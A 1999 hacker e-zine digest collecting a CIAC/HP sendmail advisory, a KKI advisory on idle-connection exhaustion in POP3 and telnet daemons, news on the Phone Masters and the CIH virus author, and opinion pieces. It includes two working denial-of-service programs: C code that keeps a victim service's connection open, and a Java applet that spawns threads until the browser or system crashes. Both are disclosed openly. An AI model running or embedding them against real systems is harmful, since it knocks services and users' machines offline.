From: CIAC Mail User <ciac@rumpole.llnl.gov>
To: ciac-bulletin@rumpole.llnl.gov
Subject: CIAC Bulletin J-040: HP-UX Security Vulnerability in sendmail
[ For Public Release ]
-----BEGIN PGP SIGNED MESSAGE-----
__________________________________________________________
The U.S. Department of Energy
Computer Incident Advisory Capability
___ __ __ _ ___
/ | /_\ /
\___ __|__ / \ \___
__________________________________________________________
INFORMATION BULLETIN
HP-UX Security Vulnerability in sendmail
April 26, 1999 17:00 GMT Number J-040
___________________________________________________________________________
PROBLEM: sendmail release 8.8.6 causes Denial of Service failures.
PLATFORM: HP 9000 Series 700/800 Servers running HP-UX 10.20 and 11.00
DAMAGE: Users can initiate a Denial of Service.
SOLUTION: Apply the publicly available patches.
___________________________________________________________________________
VULNERABILITY The risk is high. The HP bulletin states that this should be
ASSESSMENT: done as soon as possible.
___________________________________________________________________________
[Start of Hewlett-Packard bulletin]
Document ID: HPSBUX9904-097
Date Loaded: 19990419
Title: Security Vulnerability in sendmail
- -------------------------------------------------------------------------
HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00097, 20 April 1999
- -------------------------------------------------------------------------
The information in the following Security Bulletin should be acted upon
as soon as possible. Hewlett-Packard Company will not be liable for any
consequences to any customer resulting from customer's failure to fully
implement instructions in this Security Bulletin as soon as possible.
- -------------------------------------------------------------------------
PROBLEM: sendmail release 8.8.6 causes Denial of Service failures.
PLATFORM: HP 9000 Series 700/800 Servers running HP-UX 10.20 and 11.00
DAMAGE: Users can initiate a Denial of Service.
SOLUTION: Apply the patches listed below.
AVAILABILITY: All patches are available now.
- -------------------------------------------------------------------------
I.
A. Background
Hewlett-Packard Company HP9000 Series 700/800 systems that are
running sendmail release 8.8.6 accept connection
s sub-optimally,
which cause security problems. Public domain fixes now in sendmail
8.9.3 have been ported to HP-UX sendmail 8.8.6 release patch.
B. Fixing the problem
For HP-UX releases prior to 10.20, upgrade from sendmail 5.65 to
sendmail release 8.8.6. See www.software.hp.com
For HP-UX release 10.20: PHNE_17135;
For HP-UX release 11.00: PHNE_17190.
C. To subscribe to automatically receive future NEW HP Security
Bulletins or access the HP Electronic Support Center, use your
browser to get to our ESC web page at:
http://us-support.external.hp.com (for non-European locations),
or http://europe-support.external.hp.com (for Europe)
Login with your user ID and password (or register for one).
Remember to save the User ID/password assigned to you.
Once you are in the Main Menu:
To -subscribe- to future HP Security Bulletins,
click on "Support Information Digests".
To -review Security bulletins already released-,
click on the "Search Technical Knowledge Database."
To -retrieve patches-, click on "Individual Patches" and select
appropriate release and locate with the patch identifier (ID).
To -browse the HP Security Bulletin Archive-, select the link at
the bottom of the page once in the "Support Information Digests".
To -view the Security Patch Matrix-, (updated daily) which
categorizes security patches by platform/OS release, and by
bulletin topic, go to the archive (above) and follow the links.
The security patch matrix is also available via anonymous ftp:
us-ffs.external.hp.com or ~ftp/export/patches/hp-ux_patch_matrix
D. To report new security vulnerabilities, send email to
security-alert@hp.com
Please encrypt any exploit information using the security-alert
PGP key, available from your local key server, or by sending a
message with a -subject- (not body) of 'get key' (no quotes) to
security-alert@hp.com.
Permission is granted for copying and circulating this Bulletin to
Hewlett-Packard (HP) customers (or the Internet community) for the
purpose of alerting them to problems, if and only if, the Bulletin
is not edited or changed in any way, is attributed to HP, and
provided such reproduction and/or distribution is performed for
non-commercial purposes.
Any other use of this information is prohibited. HP is not liable
for any misuse of this information by any third party.
________________________________________________________________________
- -----End of Document ID: HPSBUX9904-097-----------------------------------
[End of Hewlett-Packard bulletin]
___________________________________________________________________________
CIAC wishes to acknowledge the contributions of Hewlett-Packard Company for
the information contained in this bulletin.
___________________________________________________________________________
CIAC, the Computer Incident Advisory Capability, is the computer
security incident response team for the U.S. Department of Energy
(DOE) and the emergency backup response team for the National
Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
National Laboratory in Livermore, California. CIAC is also a founding
member of FIRST, the Forum of Incident Response and Security Teams, a
global organization established to foster cooperation and coordination
among computer security teams worldwide.
CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
can be contacted at:
Voice: +1 925-422-8193
FAX: +1 925-423-8002
STU-III: +1 925-423-2604
E-mail: ciac@llnl.gov
For emergencies and off-hour assistance, DOE, DOE contractor sites,
and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
8AM PST), call the CIAC voice number 925-422-8193 and leave a message,
or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two
Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC
duty person, and the secondary PIN number, 8550074 is for the CIAC
Project Leader.
Previous CIAC notices, anti-virus software, and other information are
available from the CIAC Computer Security Archive.
World Wide Web: http://www.ciac.org/
(or http://ciac.llnl.gov -- they're the same
machine)
Anonymous FTP: ftp.ciac.org
(or ciac.llnl.gov -- they're the same machine)
Modem access: +1 (925) 423-4753 (28.8K baud)
+1 (925) 423-3331 (28.8K baud)
CIAC has several self-subscribing mailing lists for electronic
publications:
1. CIAC-BULLETIN for Advisories, highest priority - time critical
information and Bulletins, important computer security information;
2. SPI-ANNOUNCE for official news about Security Profile Inspector
(SPI) software updates, new features, distribution and
availability;
3. SPI-NOTES, for discussion of problems and solutions regarding the
use of SPI products.
Our mailing lists are managed by a public domain software package
called Majordomo, which ignores E-mail header subject lines. To
subscribe (add yourself) to one of our mailing lists, send the
following request as the E-mail message body, substituting
ciac-bulletin, spi-announce OR spi-notes for list-name:
E-mail to ciac-listproc@llnl.gov or majordomo@rumpole.llnl.gov:
subscribe list-name
e.g., subscribe ciac-bulletin
You will receive an acknowledgment email immediately with a confirmation
that you will need to mail back to the addresses above, as per the
instructions in the email. This is a partial protection to make sure
you are really the one who asked to be signed up for the list in question.
If you include the word 'help' in the body of an email to the above
address,
it will also send back an information file on how to subscribe/unsubscribe,
get past issues of CIAC bulletins via email, etc.
PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins. If you are not part of these
communities, please contact your agency's response team to report
incidents. Your agency's team will coordinate with CIAC. The Forum of
Incident Response and Security Teams (FIRST) is a world-wide
organization. A list of FIRST member organizations and their
constituencies can be obtained via WWW at http://www.first.org/.
This document was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
Government nor the University of California nor any of their
employees, makes any warranty, express or implied, or assumes any
legal liability or responsibility for the accuracy, completeness, or
usefulness of any information, apparatus, product, or process
disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products,
process, or service by trade name, trademark, manufacturer, or
otherwise, does not necessarily constitute or imply its endorsement,
recommendation or favoring by the United States Government or the
University of California. The views and opinions of authors expressed
herein do not necessarily state or reflect those of the United States
Government or the University of California, and shall not be used for
advertising or product endorsement purposes.
LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)
J-030: Microsoft BackOffice Vulnerability
J-031: Debian Linux "Super" package Buffer Overflow
J-032: Windows Backdoors Update II:
J-033: SGI X Server Font Path Vulnerability
J-034: Cisco 7xx TCP and HTTP Vulnerabilities
J-035: Linux Blind TCP Spoofing
J-036: LDAP Buffer overflow against Microsoft Directory Services
J-037: W97M.Melissa Word Macro Virus
J-038: HP-UX Vulnerabilities (hpterm, ftp)
J-039: HP-UX Vulnerabilities (MC/ServiceGuard & MC/LockManager, DES
-----BEGIN PGP SIGNATURE-----
Version: 4.0 Business Edition
iQCVAwUBNySJe7nzJzdsy3QZAQHNBwP/c9SF9GjFRwhkNjYdr6Hs7eyAdh23JoKE
jcWLPR3qIdBg/uENXqe6Jz+G9t5V4qORE592wi+KgLNuLypm2A4wHmJS7Agdb8Pt
DilC6Kh5VRGUtn+TknLRLcj1DsHpTnaJ5cmN3ozvqX1H566xfn2jexWSuHujECH3
fz8VGVHwfpE=
=7fHx
-----END PGP SIGNATURE-----
@HWA
46.0 KKI inactive connections security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 28 Apr 1999 13:59:28 +0200
From: Lukasz Luzar <lluzar@SECURITY.KKI.PL>
To: BUGTRAQ@netspace.org
Subject: KKIS.28041999.002.b
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
### ### ### ### ###
### ### ### ### ###
###### ###### ###
### ### ### ### ###
### ### ### ### ###
S E C U R I T Y
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
KKI Security Team Cracow Commercial Internet
http://www.security.kki.pl http://www.kki.pl
mailto:security@security.kki.pl mailto:biuro@kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Raport title : Flaws in implementations of mechanisms which
prevents from maintaining the parasitize connections
in many tcp network services.
Problem found by : Lukasz Luzar (lluzar@security.kki.pl)
Raport created by : Robert Pajak (shadow@security.kki.pl)
Lukasz Luzar (lluzar@security.kki.pl)
Raport published : 28 April 1999
Raport code : KKIS.28041999.002.b
Vulnerable programs : qpopper, in.pop3, cucipop, telnetd, ...
Systems affected : Linux, FreeBSD, Solaris, ...
Archive : http://www.security.kki.pl/advisories/
Risk level : low
~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The designers of many popular network services are trying to make the
mechanisms which should prevents from maintaining the parasitize connections
to their programs.
The exercise of such protection is timeout, which closes inactive
connections.
But some of those designers forgets that some malicious guys may often
and fraquently send strings full of bad or null commands to the open port
of the service. Such situation might happen before login/password
authentication of the connection.
Those programmers should implement additional mechanisms to prevent such
situations. Good solution is to put counter of bad (or null) commands
inside the program.
For example, the similiar mechanism has been applied in sendmail.
This soluition is effective and very easy to implement.
Lack of this mechanism may be quite threateing, because most of that tcp
services are working with root privilages, and the bounds of amount of root
proceses isn't easy, when the service has no internal bound.
That affects whole system, when proccess table is fulfiled for
example by multiply open connections to the vulnerable tcp service.
Worst situation is, when vulnerable service doesn't logs any information
about connection before authentication with login/password.
One of this most vulnerable services is cucipop.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Below example shows how to open and maintain the connection,
which might state open by undefined time.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--- CUT HERE ---
/*
* example.c by Lukasz Luzar (lluzar@security.kki.pl)
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* victim's address and port of service */
#define ADDR "10.0.0.1" //IP in dot natation
#define PORT 110 //e.g. some pop3
#define DELAY 4 //(4 secs.) how often we are sending bad commands
#define COMMAND "\n" //some bad (or null) command
void main()
{
int sockfd,
j,k;
struct sockaddr_in victim_addr;
bzero((char *) &victim_addr, sizeof( victim_addr));
victim_addr.sin_family = AF_INET;
victim_addr.sin_addr.s_addr = inet_addr( ADDR);
victim_addr.sin_port = htons( PORT);
if(( sockfd = socket( AF_INET, SOCK_STREAM, 0)) < 0)
fprintf( stderr, "socket error\n");
if( connect( sockfd,(struct sockaddr*) &victim_addr,
sizeof( victim_addr)) < 0)
fprintf( stderr,"connect error\n");
k = 1;
if( setsockopt( sockfd,IPPROTO_TCP,TCP_NODELAY,&k,sizeof( k)) != 0)
fprintf( stderr,"setsockopt error\n");
j = strlen( COMMAND);
for(;;) {
if( write( sockfd,COMMAND,j) == -1)
fprintf( stderr,"write error\n");
fprintf( stderr,".");
sleep( DELAY);
}
}
--- CUT HERE ---
~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright (c) 1999 KKI Security Team, Poland
All rights reserved.
All questions please address to mailto:security@security.kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
@HWA
47.0 How to achieve the status JP has with AntiOnline (from PacketStorm)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
AntiOnline Mini-howto
Shark Fin, ph1sh@pmc.com.au
v1.0, 28 April 1999
This document discusses the techniques used and implemented by well
known `media whore' John Vranesevich (aka JP). It also includes full
details of how you to can implement such techniques to achieve the
same status as JP has. This document is not endorsed nor sponsored by
AntiOnline.
_____________________________________________________________________
Table of Contents
1. Introduction
1.1 Overview
1.2 History
1.3 Future Revisions
1.4 Feedback
1.5 Copyright
1.6 Standard Disclaimer
2. What is AntiOnline
3. Techniques used by AntiOnline
3.1 The `rip'
3.2 The `narq'
3.3 IRC Warrior acts
4. Overview
_____________________________________________________________________
1. Introduction
1.1 Overview
The purpose of this document is to discuss and detail the deplorable
morals and techniques implemented by JP and the running of his
website. It will shed important light on the true workings of
AntiOnline for newcomers.
This document is not endorsed nor sponsered by AntiOnline in any way.
1.2 History
- v1.0 Descripion of morals and techniques employed by AntiOnline
1.3 Future Revisions
If the deplorable and unprecedented acts of commercialism, `narqing',
code ripping, IRC Warrior Acts, lying, plagorism. etc. that we have
come to expect from AntiOnline there should be future revisions of
this document.
1.4 Feedback
I welcome any feedback on this document to ph1sh@pmc.com.au,
comments supporting or defending AntiOnline's morals are symlinked
to /dev/null .
1.5 Copyright
The AntiOnline Mini-howto is copyrighted (c)1999 ph1sh
(yes, you to JP)
1.6 Standard Disclaimer
I disavow any potential liability for the contents of this document.
Use it at your own risk. Rest assured however that the contents of
this document are all verified.
2. What is AntiOnline?
The AntiOnline Network per-se, is a collection of sites, all ripped
by JP (jp@antionline.com) and his side kicks. It was originally
developed by JP in order 'to educate the public'. However, it bemises
me how someone who knows so little about computer security can
educate a thriving online community. And as the host of the newly
found D.o.S tool, `muerte', being the main feature of the site, I
also fail to see how the public is educated in any way.
AntiOnline was then moved to the University of Pittsburgh, where JP
was attending college. In time, someone at Pitt actually got a clue
and removed the site from the College server, obviously identifying
that the site's content and aims had nothing in common at all.
AntiOnline was duly moved to a Lazerlink account where it grew in
retardedness unbelievebly, posting ripped code and articles
where ever it could be done.
In true JP fashion, he has recently become a commercial sell-out by
hooking up with a couple of corporate sponsers and purchasing
expensive software just so he can make a neat hack attempts page.
3. Techniques used by AntiOnline
3.1 The `rip'
AntiOnline is notorious for publishing plagorised material. This
would probably represent the true lack of knowledge attained by JP,
and his lack of pride and creativity.
Prime examples include the Buffer Overflow special report
(http://www.antionline.com/SpecialReports/buffer_overflows), compare
this to aleph1's 'smashing the stack for fun and profit' released in
Phrack 49.
More recent examples of ripping by AntiOnline, are the layout to
AntiCode, completely ripped from freshmeat.net, and the editing
of code to insert credits to AntiCode, in some cases removing author
credits.
Lesser examples of ripping would be in ways claiming the hacker
wargames as a 'product of antionline', when they were old news
anyway. Also, JP's special report on hacker culture was a rip from
an article posted to attrition.org
3.2 The `narq'
Ok, JP will use you for publicity when you're going around using your
0-day kodez to break into lots of web sites, but are you really
dealing with someone who is interested in protecting your privacy?
NO. His recent reports on 'finger-printing' hackers (completely
moronic) just go to show that he is out there to help authorities
track you down. He is also believed to funding Carolyn P. Meinel in
her efforts to track down hackers.
3.3 IRC Warrior acts
Yep, hope you've got your system patched when you're sitting on IRC
and JP is around, ask anyone who keeps logs of his attacks for some
proof of incessant smurf attacks etc.
4.0 Overview
Ok, I got bored of wasting my time writing about JP so I'll wrap it
up here. AntiOnline is a collaborative effort to rip your code and
steal your ideas. Please help in spreading the word by posting this
howto wherever you can, and associating yourself with the right
people.
JP, take your legal crap somewhere else.
WWW: http://ph1sh.fsn.net
@HWA
48.0 Crash your browser.(JAVA)
~~~~~~~~~~~~~~~~~~~~~~~~~
Windows thread overrun from a Java Applet
Whether you found this page by searching Yahoo, reading a newsgroup, received an e-mail, or any other way, you obviously came here for one of two
reasons 1) you want to see what the talk is about, or 2) some "friend" of yours wanted you to get nailed by the problem.
The second reason is why I created this page. I've added this as a layer of indirection, and as a way to add information as more becomes available. In the
interest of security, I will periodically be changing the name of the applet and the page it's on, so that not too many people have problems from direct links
Background
I found this flaw as a part of some research I did beginning summer 1998, and ending December of the same. I have personally reported this security flaw on
two occasions, and I am certain that the overseeing professor (B Clifford Neuman, ISI) reported it himself. I have held off on creating a public spectacle of
this flaw for several months in an effort to give Sun and/or Microsoft an opportunity to correct the issue.
How It Works
It's rather simple, the applet simply creates more and more threads until the kernel panics. Probably the worst part is that the download is only 941 bytes,
smaller than a normal picture. Basically that means that even running on a 28.8 modem the download is less than 1/3 of a second, and by the time most people
would consider that there is a problem the applet is running. There is also an equivalent standard executable version, but I'm not going to discuss it here.
Isn't this just a DoS (Denial of Service) attack?
The debate rages on, there are some very valid points on both sides of the argument, but in the end, it doesn't really matter, this entire class of problems can
be solved (more information)
The Fix
It should be rather simple for either Microsoft or Sun to fix it. The fix would consist simply of adding threadsafe thread counting to the thread spawning code,
as well as the thread termination code. It would be most logical for Microsoft to fix the code because a standard executable that does the same thing.
Why I'm Bringing The Issue Up At All
Knowledge of the applet has been spreading slowly and may soon become an issue, so I'm attempting to get real information available before a problem
occurs.
Known Results
Windows 95
Ie3.x: No data
Ie4 (no alterations): crash
Ie4 (jdk 1.2): crash
Ie4 (jdk 1.21): crash
Ie5 (no alterations): crash
Ie5 (jdk 1.21): crash
Appletviewer (1.1.8, 1.2, 1.21): crash (very fast to very slow)
Netscape Communicator 4.x (no alterations): crash, there has been one report of the browser crashing without the computer crashing
Windows 98
Ie3.x: No data
Ie4 (no alterations): crash
Ie4 (jdk 1.2): crash
Ie4 (jdk 1.21): crash
Ie5 (no alterations): crash
Ie5 (jdk 1.21): crash
Appletviewer (1.1.8, 1.2, 1.21): crash (very fast to very slow)
Netscape Communicator 4.x (no alterations): crash, there has been one report of the browser crashing without the computer crashing
Windows NT: System performance degrades significantly but does not stop, but the browser hangs eventually (and attempting to start a new process can
cause a crash), system eventually becomes usable again
OS2 Warp: System performance degrades significantly but does not stop, but the browser hangs eventually (and attempting to start a new process can cause
a crash), system eventually becomes usable again
UNIX (Solaris, Tru64, Linux (Alpha)): System remains usable, the browser hangs eventually
Macintosh: System remains usable, the browser hangs or crashs
Please email me with any new results (or even if you want to confirm the posted results)
The Source
I've received numerous complaints about my releasing the source code. I'm taking this time to explain the reasoning behind it. The HTTP protocol is publicly
available as an RFC, which makes it easy enough for any would-be hacker to grab the applet without too much difficulty (but no one has complained about
me making this applet available publicly). Therefore releasing the source code serves only to make it possible for security measures to be developed quickly,
and efficiently, as well as developing protection against the entire class of attacks instead of just searching for this applet.
The Page
BEWARE!!!! CLICKING HERE IS NOT RECOMMENDED.
The Source
Questions
Please feel free to email me at ashwood@usc.edu if you have any questions regarding this applet.
Reporting abuse
If you have run across a page that you believe has this applet (or one similar) running on it, please e-mail me at ashwood@usc.edu ASAP. I will gladly
maintain the list of sites.
I am not the first to find this problem
I have not yet had the opportunity to verify it, but I have been informed that in the book titled "Tricks of the Java Programming Gurus" published in 1996.
import java.awt.*;
import java.applet.*;
public class minThread extends Applet implements Runnable {
Thread myThread = null;
int howMany = 0;
public static void main(String args[])
{
minThread that = new minThread();
that.start();
}
public void init() {
start();
}
public void start() {
// we start a new thread
myThread = new Thread(this);
myThread.start();
run();
// the code for the new Thread is in the run() method
}
public void run() {
try {
for (;;) {
myThread = new Thread(this);
myThread.start();
}
}
catch (Exception e)
{
//out of memory, so waste processor
for(;;)
{
}
}
}
public void stop() {
// myThread has to be stopped before the applet stops
myThread = null;
}
public void destroy() {
}
public void paint(Graphics g) {
}
}
49.0 Phone Rangers break into GTE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Phone Masters Break Into GTE
contributed by epter
There is so much FUD (Fear, Uncertainty and Doubt)here it is hard to separate the facts from the
sensationalism. Evidently a group of "cyber terrorists" known as the "Phone Rangers" broke into the
computer/telephone network of GTE in the Dallas Fort Worth area. The "computer hackers" reportedly had the
ability to disrupt 911 calls, shut down police departments and warn drug dealers of wire taps. The
'hacks' reportedly started over four years ago and are only now being made public. What the article does not
say is whether the attacks have stopped or whether anyone has been arrested or charged with a crime. This
'report' is mostly what could have happened as opposed to what actually did happen.
WFAA Dallas FortWorth TV
http://www.wfaa.com/news/9904/29/cyber_terrorism_1.html
N E W S 8 I N V E S T I G A T E S
Cyber Terrorists Invade Phone Networks
by Robert Riggs
April 29 1999
GTE's network operations center at DFW International
Airport was targeted by computer hackers.
DALLAS -- It was the largest cyber-assault on the nation's communications networks.
A computer security breach received little attention when it was announced in Dallas last month. Hackers
had been caught stealing thousands of long distance calling card numbers.
News 8 Investigates learned it was a case with national
security implications.
A group of computer hackers invaded telephone systems so deeply that they could
shut down 911 operators. In fact, they retaliated for a speeding ticket by crashing the
phone system at a police department. They also tipped off drug dealers to wiretaps.
Until now, this cyber-attack has been a closely-guarded secret. Computer hackers
have broken into the networks of the world's largest telephone companies.
They were just a few keystrokes away from blinding air traffic controllers, shutting down banks,
or cutting off military bases. It's not the plot of the latest cyber-horror movie.
This frightening penetration of the nation's telecommunications systems actually happened
right here in North Texas.
The hackers' target list included GTE's 28-state network, controlled from a nerve center at DFW
International Airport. They had the capability of causing a "cyber Pearl Harbor"
had they wanted to.
FBI Agent Mike Morris led the investigation. "We had a number of telephone companies,
long distance carriers and local exchange carriers that thought the were impenetrable,"
Morris said. "They thought they were little castles."
HACKING HISTORY
The first confirmed break-in occurred four years ago when the hackers first took control of
computerized phone switches. The switches route calls around the world. The hackers
gained unrestricted access to GTE, Sprint, MCI and the regional Baby Bell networks.
Their early attacks went undetected, and alarmed top levels of the U.S. government.
Details about the case are only now becoming public.
"They could listen in on calls made through that switch," Morris explained. "If
they didn't like a person, they could turn their access off to that switch, meaning
if you tried to make a call out, it wasn't going to happen."
FBI LAUNCHES CYBER SQUAD
A tip set in motion an intensive FBI investigation that continues today. In Dallas, a
new cyber squad put a wiretap on the hackers' line. It marked the first time that agents could
monitor everything a hacker typed.
"The goal of the hackers was to basically take control of telecommunications systems
coast-to-coast," Morris said.
They came close.
THE PHONE MASTERS
FBI surveillance photos show some of the 11 hackers called the Phone Masters.
They gathered from across the country with cyber burglary tools in hand: a cloned cellular phone and
laptop computer.
The FBI identified Calvin Cantrell of Grand Prairie as a central figure in the organization.
The hackers fit the FBI's profile:
o white males
o teens to mid-20s
o self taught
o obsessed
"He wasn't very good at school, didn't make a lot of friends," Morris said of the
individuals who fit the profile. "But when he gets on the Internet and he hacks into
a system, now he basically is a cyber-God."
Even though the typical hacker is not a particularly good student, they are still
brilliant. "Some of these guys could be considered geniuses," Morris said.
"They're very smart, and they get very bored with school."
The FBI discovered that Cantrell was an unemployed 1988 graduate of Grand Prairie
High School. At his parent's home, Cantrell spent up to 20 hours a day hacking into
computer systems. The FBI said Cantrell took confidential credit and crime records out of
computer systems and traded people's secrets for cash.
"Calvin represented himself as an information
broker," said private investigator Trace Carpenter, who purchased personal
information from Cantrell. He said Cantrell bragged about even getting phone
records close to the President. "He was obtaining long distance records for Bill
Clinton's mother," Carpenter said. "I suppose this was in an effort to find a back
line into the Oval Office, so to speak."
HACKERS TARGET WHITE HOUSE
Indeed, the Phone Masters hacked into White House phone records and unlisted numbers, according to
sources in the telecommunications industry. "It shows the vulnerability of our everyday systems that
we use," said Assistant U.S. Attorney Matt Yarborough.
Yarborough is now prosecuting the Phone Masters for stealing millions of dollars worth of long distance
calling card numbers.
"Knowing and holding the keys to that system, any foreign agent or domestic hacker could choose to hack
it," Yarborough said. "That could have a wide-ranging impact on our financial institutions, power and
electrical, the systems we use and interact with every day."
The FBI said the Phone Masters discussed crashing vital computer systems. It's unclear what the hackers
may have done before the FBI got on their trail.
The hackers declined to talk to News 8.
@HWA
50.0 Police question CIH virus creator
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Police Question CIH Suspect
contributed by mdef
Taiwanese police are questioning Chen Ing-hau, 24,the self admitted creator of the CIH or Chernobyl virus that
struck earlier this week. Authorities have not yet arrested Chen Ing-hau, but are trying to clarify what, if
any, legal responsibility he could face if convicted.
BBC http://news.bbc.co.uk/hi/english/world/newsid_332000/332147.stm
Friday, April 30, 1999 Published at 10:26 GMT 11:26 UK
World
Chernobyl virus suspect
questioned
Chen Ing-hau could face a three-year jail sentence (see url for picture)
Police in Taiwan are questioning a computer expert who they say has admitted creating the Chernobyl virus,
which caused major disruption earlier this week.
Police say Chen Ing-hau, 24, has not been charged and their investigation is in its early stages.
He is said to have offered his help in efforts to counteract the virus.
Hundreds of thousands of computers
in Asia and the Middle East had their
data wiped by the malicious
programme on 26 April - the
anniversary of the Ukrainian nuclear
disaster in 1986.
Police say Mr Chen - who recently graduated from Taipei's Tatung Institute of Technology but is currently
doing his military service - has said he did not intend to cause such massive damage.
Authorities say they are trying to clarify what, if any,legal responsibility he could face if convicted.
In Taiwan, intentionally spreading a computer virus is an offence that carries a possible three-year prison term.
Boasting to colleagues
Although popularly dubbed Chernobyl, the virus is known to experts as CIH.
According to Taiwanese media reports, Mr Chen's colleagues say he had acknowledged using his own
initials in naming the virus.
Former classmates and instructors said he had boasted of creating the Chernobyl virus and warned friends not to
download it into their computers.
Some reports said Mr Chen had been reprimanded quietly by his institute a year ago but not further
disciplined, prompting an Internet debate about Taiwan's vigilance against cybercrime.
Deadly effects
The United States and Europe largely escaped the virus's effects this week, as companies had protected
their computers with anti-virus programs that killed it.
But in Asia and the Middle East the same precautions had in many cases been ignored.
Chernobyl also spreads through pirated software, which is rife in these parts of the world.
Chernobyl is less widespread than the e-mail replicator virus Melissa, but it has been warned to be far more
serious, especially on Windows 95 or 98 machines.
The virus can delete most of the data stored on computers and can even wipe out the BIOS - the basic
instructions that tell the computer to start.
@HWA
51.0 [ISN] The Virus Vault
~~~~~~~~~~~~~~~~~~~~~
Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
(April 28, 1999 12:46 a.m. EDT http://www.nandotimes.com) - Even the most
stout-hearted hard drive would shudder. Copies of more than 43,000
computer viruses are kept under lock and key at the Malicious Code
Laboratory in rural Pennsylvania, a facility operated by a company that
has become the equivalent of the World Health Organization for the data
processing industry.
"That lab in Carlisle, Pa., has good physical security. You cannot get in
without a key card," assures Roger Thompson, the affable, Australian-born
technical director for malicious code research for the firm.
His company - ICSA Inc., which has its headquarters in a Washington, D.C.,
suburb - uses the pernicious software to test and certify dozens of
commercial security programs that corporations and individuals hope will
protect them from malicious hackers.
Thompson said the list of known viruses grows by about 1,000 a month, but
many of these are simple modifications of older viruses.
"Of all of the thousands of viruses we've identified, only about 150
actually get onto very many people's computer desktops. And maybe another
500 or so make it to localized outbreaks," Thompson said.
The reason, despite tremendous media hype, is that computer viruses
generally have a hard time proliferating. Writers of virus programs have a
hard time designing a bug that will attack most personal computers because
of the incredible diversity of software that computers use.
"There are a few viruses that we call Win32-infectors, because they attack
the Windows operating system itself. But these are very hard to write, so
we don't see many of them," Thompson said.
Instead, virus authors rely upon "macro" programs that attach to specific
kinds of software.
"We've identified about 4,000 macro viruses that attach themselves to
Microsoft Office products. The reason these guys do this is they want
their viruses to spread, so they pick popular software," Thompson said.
Police arrested David L. Smith, 30, of Aberdeen Township, N.J., last month
and charged him with authorship of the "Melissa" virus, which disrupted
e-mail systems for several large companies, including Charles Schwab & Co.
"Melissa wasn't overly bright. It only targeted Microsoft Mail, which
isn't all that popular. But the guy found a good way to get his virus to
spread," Thompson said.
The program gummed up e-mail systems by sending out thousands of versions
of itself, as well as pornographic Web site passwords and addresses.
Despite its simplicity and the severe limitations on the kinds of software
it attacks, Melissa received enough news coverage to accelerate security
concerns for businesses that increasingly rely upon the Internet.
"We are now a wired world," said Laurie W. Wagner, senior vice president
for marketing at ICSA. "So security has become an issue for everyone, from
simple consumer marketing to business-to-business transfer of critical
information."
Wagner said anti-virus programs and other software designed to protect
computer equipment are expected to grow from a $5 billion industry in 1997
to $25 billion by 2003. That's a lot of money in order to stop a handful
of bored and mostly youthful mischief-makers.
"A lot of them truly are kids," Thompson said. "I've met one guy who used
to be known as 'Storm-Bringer' who has come across from the dark side. He
was an intelligent young man who just decided to grow up. It was clear
that this (virus writing) was something he did just because he knew how."
Measures to defeat "hackers" - computer enthusiasts who delight in gaining
access to private, often sensitive, computer files using telephone lines
or the Internet - are also becoming big business. Internet security
services alone are projected to grow from a $4.6 billion market in 1996 to
$11.6 billion within three years.
ICSA computers at its Reston, Va., headquarters endlessly look for ways
that hackers could break into corporate data systems. Once identified,
these "back doors" are either closed or given "firewall" software
protection to prevent unwanted outside access across the Internet.
"Frequently, we find a lot of undocumented Web addresses that companies
didn't know about," Wagner said. Hackers can gain access to an entire
computer system through an unprotected site on the Web.
"We conducted a scan for one company that had more than 1,000 undocumented
sites," she said. "They were pretty surprised."
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
52.0 [ISN] The Bad Guys are Crackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Bad Guys Are Crackers
In Defense of Hackers
Will there be more and more hackers over the next couple of years?
Brent Gomes
I sincerely hope so! Now, before you label me as some crazed
anarchist, let me explain. Most of us geeks who are in the technology
business believe ourselves to be hackers, and if someone ever calls me one
I consider it a compliment. It's time to dispel some rumors about hackers
and clear the air about one of the most misused terms of the computer
generation.
The ancient definition of a hacker is someone who makes furniture
with an axe. These days a hacker can be described as a very capable
programmer, or a person who enjoys exploring the details of programmable
systems. Someone might think you are a hacker if you spend hours and
hours figuring out how your computer system works and developing cool
applications (called "hacks") that perform some useful function. In short,
